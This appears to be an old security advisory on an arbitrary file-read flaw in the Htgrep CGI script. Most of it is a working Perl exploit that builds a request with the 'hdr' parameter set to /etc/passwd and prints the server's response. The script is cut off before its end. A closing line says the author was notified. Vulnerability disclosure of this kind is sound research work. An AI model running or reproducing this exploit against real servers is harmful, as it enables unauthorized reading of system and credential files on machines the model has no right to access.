

    Htgrep CGI


    'n30' found following.  Any  remote user can view arbitrary  files
    on the  system with  the privileges  of the  web user with htgrep.
    The CGI allows a  user to specify a  header and footer file  to be
    appended to  the search  output, this  file should  be located  in
    the wwwroot which is specified in the script itself.  Any  attempt
    to specify a  header or footer  file by using  backwards directory
    referencing is trapped.  Although it is possible to specify a file
    using an absolute path.


    The  File  /etc/passwd  will  be  displayed instead of the default
    header file.  Code:

    # Htgrep EXPLOIT Script by n30 17/8/2000
    # For: Unix/Linux all Distro's
    #      maybe Winnt?? anyone??
    # Versions: All upto latest: htgrep v3.0
    # Info: to find the version number being used:
    # Some ppl use a wrapper for the script thusly
    # eliminating the file argument, the sploit will
    # still werk just add &hdr=<filename> to the end :-)
    # if &isindex=<text> is present in the URL REMOVE IT!!!
    # or else the exploit won't werk :-)
    # Mail :
    use strict;
    use LWP::UserAgent;
    use HTTP::Request;
    use HTTP::Response;
    my $ua = new LWP::UserAgent;
    # *************************************************
    my $TargetHost="";
    my $TargetPath="/cgibin/htgrep";
    # SearchFile can commonly be index.html or some other file in the wwwroot
    my $SearchFile="index.html";
    # FiletoGet ?? think for ur self:
    my $FiletoGet="/etc/passwd";
    # **************************************************
    my $url="http://".$TargetHost.$TargetPath."/file=$SearchFile&hdr=$FiletoGet";
     print("\nHtgrep Arbitrary File Reading Vulnerability EXPLOIT /n30\n\n");
     print("URL: $url\n\n");
     my $request = new HTTP::Request('GET', $url);
     my $response = $ua->request($request);
     if ($response->is_success) {
          print $response->content;
     } else {
          print $response->error_as_HTML;


    The author has been notified, it is likely that an update will  be
    available shortly.